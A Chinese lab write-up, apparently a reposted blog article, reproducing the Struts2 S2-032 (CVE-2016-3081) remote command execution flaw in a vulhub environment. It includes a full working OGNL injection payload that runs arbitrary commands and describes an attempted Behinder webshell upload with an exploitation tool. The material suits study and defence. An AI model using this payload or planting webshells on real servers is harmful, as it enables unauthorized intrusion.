CVE-2016-3081 S2-032复现
2021/12/5 6:21:25
本文主要是介绍CVE-2016-3081 S2-032复现,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
0X00-引言
当当当
0X01-环境搭建
靶机:CentOS Linux 7
攻击机:windows server 2016 && Kail
环境:vulhub
项目地址:https://github.com/vulhub/vulhub
搭建vulhub请访问:空白centos7 64 搭建vulhub(详细)
0X02-漏洞描述
Struts2在开启了动态方法调用(动态方法调用)的情况下,可以使用method:<name>
的方式来调用调用<name>
的方法,而这个方法名将进行OGNL表达式计算,导致远程命令执行漏洞。
影响版本:Struts 2.3.20 - Struts Struts 2.3.28(2.3.20.3 和 2.3.24.3 除外)
0X03-漏洞复现
01-任意命令执行
http://192.168.234.128:8080/index.action?
payload:
method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=whoami
0X04-漏洞分析
略
0X05-工具利用
工具地址:https://github.com/Liqunkit/LiqunKit_
01-检测
02-命令执行
03-文件上传
上传冰蝎马
查看路径
冰蝎连接-连接失败
回到docker中查看-找不到shell.jsp的位置
在webapp中也没有shell.jsp
尝试PUT方法上传-PUT方法不支持
文件上传走不通
0X06-查看日志
docker ps #查看容器ID docker exec -it ID /bin/bash #进入 cd logs #进入日志目录 cat localhost_access_log.2021-12-02.txt #查看日志 exit #退出容器
未找到log文件
0X07-参考
S2-032远程代码执行漏洞(CVE-2016-3081)
这篇关于CVE-2016-3081 S2-032复现的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-11-23增量更新怎么做?-icode9专业技术文章分享
- 2024-11-23压缩包加密方案有哪些?-icode9专业技术文章分享
- 2024-11-23用shell怎么写一个开机时自动同步远程仓库的代码?-icode9专业技术文章分享
- 2024-11-23webman可以同步自己的仓库吗?-icode9专业技术文章分享
- 2024-11-23在 Webman 中怎么判断是否有某命令进程正在运行?-icode9专业技术文章分享
- 2024-11-23如何重置new Swiper?-icode9专业技术文章分享
- 2024-11-23oss直传有什么好处?-icode9专业技术文章分享
- 2024-11-23如何将oss直传封装成一个组件在其他页面调用时都可以使用?-icode9专业技术文章分享
- 2024-11-23怎么使用laravel 11在代码里获取路由列表?-icode9专业技术文章分享
- 2024-11-22怎么实现ansible playbook 备份代码中命名包含时间戳功能?-icode9专业技术文章分享